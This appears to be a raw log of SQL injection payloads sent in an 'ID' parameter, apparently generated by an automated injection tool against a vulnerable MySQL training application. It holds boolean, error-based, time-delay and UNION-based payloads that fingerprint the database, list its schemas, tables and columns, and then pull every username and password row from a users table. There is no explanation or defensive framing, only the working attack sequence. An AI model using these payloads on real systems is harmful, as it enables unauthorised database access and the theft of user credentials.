ID:1
ID:1
ID:1
ID:1
ID:1
ID:5806
ID:1,'"(,)(,.,
ID:1'eAgiJf<'">cJUtfn
ID:1) AND 7394=5350 AND (3411=3411
ID:1) AND 4562=4562 AND (8479=8479
ID:1 AND 6168=9379
ID:1 AND 4562=4562
ID:1 AND 4067=5042-- vpGg
ID:1 AND 4562=4562-- ilqw
ID:1') AND 6163=2671 AND ('WzPp'='WzPp
ID:1') AND 4562=4562 AND ('bBLq'='bBLq
ID:1') AND 4005=8526 AND ('TGnk'='TGnk
ID:(SELECT CONCAT(CONCAT(0x716a627171,(CASE WHEN (5189=5189) THEN 0x31 ELSE 0x30 END)),0x71786b7671))
ID:1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a627171,(SELECT (ELT(2031=2031,1))),0x71786b7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('gyCH'='gyCH
ID:1') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a627171,(SELECT (ELT(9285=9285,1))),0x71786b7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('qhpJ'='qhpJ
ID:1') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716a627171,(SELECT (ELT(4668=4668,1))),0x71786b7671,0x78))x)) AND ('licI'='licI
ID:1') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x716a627171,(SELECT (ELT(5883=5883,1))),0x71786b7671,0x78))x)) AND ('GXjO'='GXjO
ID:1') AND GTID_SUBSET(CONCAT(0x716a627171,(SELECT (ELT(4939=4939,1))),0x71786b7671),4939) AND ('XdQb'='XdQb
ID:1') OR GTID_SUBSET(CONCAT(0x716a627171,(SELECT (ELT(5364=5364,1))),0x71786b7671),5364) AND ('ElzO'='ElzO
ID:1') AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716a627171,(SELECT (ELT(2854=2854,1))),0x71786b7671)) USING utf8))) AND ('ahKM'='ahKM
ID:1') OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x716a627171,(SELECT (ELT(6238=6238,1))),0x71786b7671)) USING utf8))) AND ('gOXO'='gOXO
ID:1') AND (SELECT 9283 FROM(SELECT COUNT(*),CONCAT(0x716a627171,(SELECT (ELT(9283=9283,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('MJus'='MJus
ID:(SELECT CONCAT(0x716a627171,(ELT(3013=3013,1)),0x71786b7671))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1');SELECT SLEEP(5)#
ID:1');SELECT SLEEP(5) AND ('rvrt'='rvrt
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))HtSV)#
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))xUNw) AND ('wSnE'='wSnE
ID:1');SELECT BENCHMARK(5000000,MD5(0x534d7546))#
ID:1');SELECT BENCHMARK(5000000,MD5(0x796f4249)) AND ('Veve'='Veve
ID:1') AND (SELECT 8606 FROM (SELECT(SLEEP(5)))onBm) AND ('rGQl'='rGQl
ID:1') AND (SELECT 8606 FROM (SELECT(SLEEP(0)))onBm) AND ('rGQl'='rGQl
ID:1') AND (SELECT 8606 FROM (SELECT(SLEEP(5)))onBm) AND ('rGQl'='rGQl
ID:1') ORDER BY 1-- -
ID:1') ORDER BY 1810-- -
ID:1') ORDER BY 10-- -
ID:1') ORDER BY 6-- -
ID:1') ORDER BY 4-- -
ID:1') ORDER BY 3-- -
ID:1') UNION ALL SELECT CONCAT(0x716a627171,0x6a7a5258477166636a67754773526e6c674c7a456d5678795965474274616c49726143564f545157,0x71786b7671),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x716a627171,0x77734776466a7364706278754e496c65526b46585455564a455955706b6a4971696972477a45775a,0x71786b7671),NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,0x7277536d4b6e614977474e78455363655a616a5a707566716668426a734157755375764a59707250,0x71786b7671)-- -
ID:1') UNION ALL SELECT CONCAT(0x716a627171,0x4663425363564d657569,0x71786b7671),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x716a627171,0x5a635674764345506a4f,0x71786b7671),NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,0x736d5a63594e70584b64,0x71786b7671)-- -
ID:-5856') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,0x554d687369586552646b625a6d74704b646d76527a6f5a5663646f4843726b484f4c61756f66544e,0x71786b7671)-- -
ID:-4930') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,(CASE WHEN (9806=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9806) THEN 1 ELSE 0 END),0x71786b7671)-- -
ID:-8537') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x71786b7671)-- -
ID:1
ID:-5627') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,JSON_ARRAYAGG(CONCAT_WS(0x79646b727675,schema_name)),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:-5685') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:-8554') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1)-- -
ID:-7671') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)-- -
ID:-8061') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)-- -
ID:-7925') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1)-- -
ID:-9484') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1)-- -
ID:-3016') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1)-- -
ID:-9598') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1)-- -
ID:-1364') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1)-- -
ID:-8623') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 8,1)-- -
ID:1
ID:-7270') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,IFNULL(CAST(DATABASE() AS NCHAR),0x20),0x71786b7671)-- -
ID:1
ID:-4544') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,JSON_ARRAYAGG(CONCAT_WS(0x79646b727675,table_name)),0x71786b7671) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:-5555') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:-8583') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(table_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 0,1)-- -
ID:-9484') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(table_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 1,1)-- -
ID:-1557') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(table_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 2,1)-- -
ID:-4662') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(table_name AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1)-- -
ID:1
ID:-4953') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,JSON_ARRAYAGG(CONCAT_WS(0x79646b727675,column_name,column_type)),0x71786b7671) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- -
ID:-5692') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- -
ID:-3839') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(column_name AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(column_type AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1)-- -
ID:-1154') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(column_name AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(column_type AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1)-- -
ID:-8475') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(column_name AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(column_type AS NCHAR),0x20),0x71786b7671) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 2,1)-- -
ID:1
ID:-6906') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,JSON_ARRAYAGG(CONCAT_WS(0x79646b727675,id,password,username)),0x71786b7671) FROM security.users-- -
ID:-2133') UNION ALL SELECT NULL,NULL,CONCAT(0x716a627171,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x71786b7671) FROM security.users-- -
ID:-5059') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 0,1)-- -
ID:-5705') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 1,1)-- -
ID:-1576') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 2,1)-- -
ID:-5227') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 3,1)-- -
ID:-6144') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 4,1)-- -
ID:-3535') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 5,1)-- -
ID:-8700') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 6,1)-- -
ID:-9706') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 7,1)-- -
ID:-6120') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 8,1)-- -
ID:-2631') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 9,1)-- -
ID:-1029') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 10,1)-- -
ID:-2475') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 11,1)-- -
ID:-9065') UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x716a627171,IFNULL(CAST(id AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(password AS NCHAR),0x20),0x79646b727675,IFNULL(CAST(username AS NCHAR),0x20),0x71786b7671) FROM security.users LIMIT 12,1)-- -
